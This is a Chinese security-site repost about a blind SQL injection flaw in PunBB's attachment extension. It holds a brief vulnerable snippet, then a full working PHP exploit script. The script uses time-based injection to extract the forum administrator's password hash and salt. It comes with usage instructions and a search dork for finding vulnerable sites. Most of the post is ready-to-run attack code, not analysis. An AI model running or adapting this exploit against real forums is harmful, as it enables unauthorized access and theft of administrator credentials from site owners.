PunBB官方上传附件扩展注射漏洞 's

admin 2017年5月7日09:39:48评论467 views字数 2718阅读9分3秒阅读模式

by Ryat

by Ryat


if (isset($_GET['secure_str'])) {     if (preg_match('~(/d+)f(/d+)~', $_GET['secure_str'], $match))     {     ...             'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = /''.$_GET['secure_str'].'/''

挺明显的,应该是对正则表达式及preg_match函数的误用,导致可以通过$_GET[‘secure_str’]来触发sql inj…



#!/usr/bin/php <?php  print_r(' +---------------------------------------------------------------------------+ Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PunBB" +---------------------------------------------------------------------------+ '); /**  * works regardless of php.ini settings  */ if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to punbb Example: php '.$argv[0].' localhost /punbb/ +---------------------------------------------------------------------------+ ');     exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2];  $pre = 'pun_';  $benchmark = 200000000; $timeout = 10;  echo "Plz Waiting.../nPassword:/n"; /**  * get pass  */ $j = 1; $pass = '';  $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 122)); //a-z letters  while (strlen($pass) < 40) {     for ($i = 0; $i <= 255; $i ++) {         if (in_array($i, $hash)) {             $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';             send();             usleep(2000000);             $starttime = time();             send();             $endtime = time();             $difftime = $endtime - $starttime;             if ($difftime > $timeout) {                 $pass .= chr($i);                 echo chr($i);                 break;             }         }         if ($i == 255)             exit("/nExploit Failed!/n");     }     $j ++; }  echo "/nSalt:/n"; /**  * get salt  */ $j = 1; $salt = '';  $hash[0] = 0; //null $hash = array_merge($hash, range(33, 126));  while (strlen($salt) < 12) {     for ($i = 0; $i <= 255; $i ++) {         if (in_array($i, $hash)) {             $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';             send();             usleep(2000000);             $starttime = time();             send();             $endtime = time();             $difftime = $endtime - $starttime;             if ($difftime > $timeout) {                 $salt .= chr($i);                 echo chr($i);                 break;             }         }         if ($i == 255)             exit("/nExploit Failed!/n");     }     $j ++; }  exit("/nExpoilt Success!/nPassword Hash:/t$pass/nSalt:/t$salt/n");  function send() {     global $host, $path, $cmd;      $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."  HTTP/1.1/r/n";     $data .= "Host: $host/r/n";     $data .= "Connection: Close/r/n/r/n";      $fp = fsockopen($host, 80);     fputs($fp, $data);      $resp = '';      while ($fp && !feof($fp))         $resp .= fread($fp, 1024);      return $resp; }  ?>

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  • 本文由 发表于 2017年5月7日09:39:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PunBB官方上传附件扩展注射漏洞 'shttps://cn-sec.com/archives/45000.html


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